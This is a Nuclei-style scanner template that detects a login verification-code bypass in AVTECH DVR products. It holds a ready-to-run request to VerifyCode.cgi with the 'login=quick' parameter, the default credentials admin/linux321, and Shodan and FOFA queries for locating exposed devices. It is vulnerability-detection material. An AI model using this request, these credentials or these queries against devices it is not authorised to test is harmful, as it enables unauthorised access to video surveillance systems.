39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: avtech-verification-bypass
|
|
|
|
info:
|
|
name: AVTECH DVR - Login Verification Code Bypass
|
|
author: ritikchaddha
|
|
severity: low
|
|
description: |
|
|
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"login" product:"Avtech"
|
|
fofa-query: app="AVTECH-视频监控"
|
|
tags: avtech,verify,bypass,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- admin
|
|
password:
|
|
- linux321
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "^0.*\nOK.*"
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- status_code == 200
|
|
- len(body) == 5
|
|
condition: and
|
|
# digest: 4b0a00483046022100f66dfc80ac1a45755069a731adee572ccf8c2a212a01cf620d518d45127b16f20221009c4b0ba05a989d4e3436f50fedca757ba584308e5fb2a9d4dcf7f810a6111861:922c64590222798bb761d5b6d8e72950 |